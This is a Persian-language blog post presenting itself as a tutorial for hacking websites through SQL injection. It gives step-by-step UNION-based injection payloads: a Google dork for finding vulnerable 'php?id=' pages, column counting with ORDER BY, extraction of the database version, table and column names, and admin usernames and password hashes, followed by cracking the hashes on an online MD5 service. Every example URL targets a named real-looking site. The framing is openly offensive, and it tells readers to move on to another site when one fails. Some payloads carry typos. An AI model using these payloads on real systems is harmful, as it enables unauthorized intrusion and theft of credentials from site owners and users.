آموزش هک سایت با باگ اس کیو ال

× اطلاعيه سايت : در کانال تلگرامي امنيت سياه عضو شويد با تشکر !

تبليغات :

آموزش هک سایت با باگ اس کیو ال

آموزش هک سایت با باگ اس کیو ال

sqlنکته:براي هک سايت باگ هاي مختلفي است اما ما با باگ اموزش ميدم
نکته:براي فهميدن اين که سايت باگ (اس کيو ال) دارد يا نه
اخر اسم این بايد اين باشد
faq.php?id=XX
به جاي
xx
يک عدد
است
مثال:
http://www.postaplus.com.sy/faq.php?id=2\"2\"
براي اينکه مطما بشيم بايد در اخر ان ( \' ) حرف را بگزاريم و اينتر بزنيم
حالا اگر ارور داد و در بين ارور ان اين حرف
Sql
بود قابل هک اما اگه نبود ول کن بريم سايت بعدي
براي اينکه سايت هايي پيدا کنيم که
faq.php?id=XX
داشته باشد در گوگل سرچ کنيد
inurl:\"php?id=\"
حالا بيشتر سايت هايي که مياد تقريبا قابل هک است
خوب بريم ادامه کار تا اينجا فرض ميکنيم در ارور حرف
SQl
بود
2________________________________
حالا در اخر اسم سايت ميزنيم
+order+by+X—
به جاي \"ايکس\" اعدادي ميگزاريم تا اخرين عدد را پيدا کنيم مثلا عدد5 سايت سالمه
6سالمه 7سالمه 8سالمه 9ارور ميده پس بايد انقدر عدد بديم تا بفهميم اخرين ستون کدام است
مثال
http://www.postaplus.com.sy/faq.php?id=2+order+by+8--
3____________________________________________
خوب حالا ميخواهيم بفهميم کدام ستون نفوظ پذير است ميزنيم
+union+select+1,2,3,4,5,6,7,8,9,10—
از 1 شروع ميکنيم تا به اخرين عددي که در مرحله 2 پيدا کرديم
مثال
http://www.postaplus.com.sy/faq.php?id=2+union+select+1,2,3,4,5,6,7,8,9,10--
در بالا ارور ميدهد چرا؟
بايد در قبل از 2
faq.php?id=2
يک (-)بزايم مثال
http://www.postaplus.com.sy/faq.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10--
حالا در همان سايت يک جواب ميدهد که در اين جواب يک عدد است
که اين عدد همان سوتون قابل نفوظ است
4__________________________________________________
براي پيدا کردن ورژن ديتابيس ميزنيم
+union+select+1,2,3,version(),5,6,7,8,9,10—
نکته:در بالا من حرف ورژن را به جاي 4 قرار دادم شما به جاي سوتون باز قرار دهيد
(همان عدد که در قسمت 3 بدست اورديم گفتيم قابل نفوظ است)
حالا جوابي ميايد به که ورژن را نوشته مثال
http://www.postaplus.com.sy/faq.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10--
5____________________________________
بدست اوردن ديتابيس
+union+select+1,2,3,database(),5,6,7,8,9,10—
نکته:در بالا من حرف ديتا بيس را به جاي 4 قرار دادم شما به جاي ستون باز قرار دهيد
(همان عدد که در قسمت 3 بدست اورديم گفتيم قابل نفوذ است)
حالا جوابي ميايد که ديتابيس را نوشته
مثال
http://www.postaplus.com.sy/faq.php?id=-2+union+select+1,2,3,database(),5,6,7,8,9,10--
6___________________________________________
گرفتن تيبل ادمين
اين مد را به اخر سايت اضافه ميکنيم تا نام :تيبل ها\" را بدست اوريم
+union+select+1,group_concat(table_name),3,4+from+information_schema.tables—
حالا نام تيبل ها به رديف مياد ما بايد بدنبال اين تيبل ها بگرديم
(admins,admin,user,users)يا نام هايي شبيه اين
اگر اينجور نام هارا نجستيد ديگه سايت به درد نميخوره بايد برين يک سايت ديگه
فرص کنيم حرف
userبود
name tabel admin sait = \"user\"
7__________________________________________
بدست اوردن \"کولدومن\"هاي ادمين
اين کد را اخر سايت اضافه ميکنيم
union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=XXX—
XXXبه جاي
نام \"تيبل\"که در مرحله 6 بدست اورديد وارد کنيد
مثال
union+select+1,group_concat(column_name),3,4+from+informaion_schema.columns+where+table_Name=user—
حالا نام تيبل هاي ادمين مياد
8_________________________________________________
بدست اوردن يوزر
+union+select+1,C,3,4_from+T—
T=Name table ke be dast avadid
C=name column ke be dast ovordid bedid
((کولدوم هاي زيادي بدست مياد براي بدست اوردن يوزر ان مولدووم هاي که نامشون شبيه يوزر است وارد کنيد))
9__________________________________________________
بدست اوردن پسوورد
+union+select+1,C,3,4_from+T—
T=Name table ke be dast avadid
C=name column ke be dast ovordid bedid
((کولدوم هاي زيادي بدست مياد براي بدست اوردن يوزر ان کولدووم هاي که نامشون شبيه پسوورد هست را بدهيد است وارد کنيد))
10_______________________________________
پسوردي که بدست مياد به شکل هاش کد مياد
براي اينک کد به صورت طبيعي شود وارد سايت
md5decrypter.co.uk
شويد
و هاش کد بدست امده را وارد کنيد.
ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ

امنیت سیاه


مطالب مرتبط :

ارسال نظر براي اين مطلب :


نام
آدرس ایمیل
وب سایت/بلاگ
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

آپلود عکس دلخواه:







نمایش کلیه نظرات
با کيليک بروي +1 از امنيت سياه حمايت کنيد

ابزار وبمستر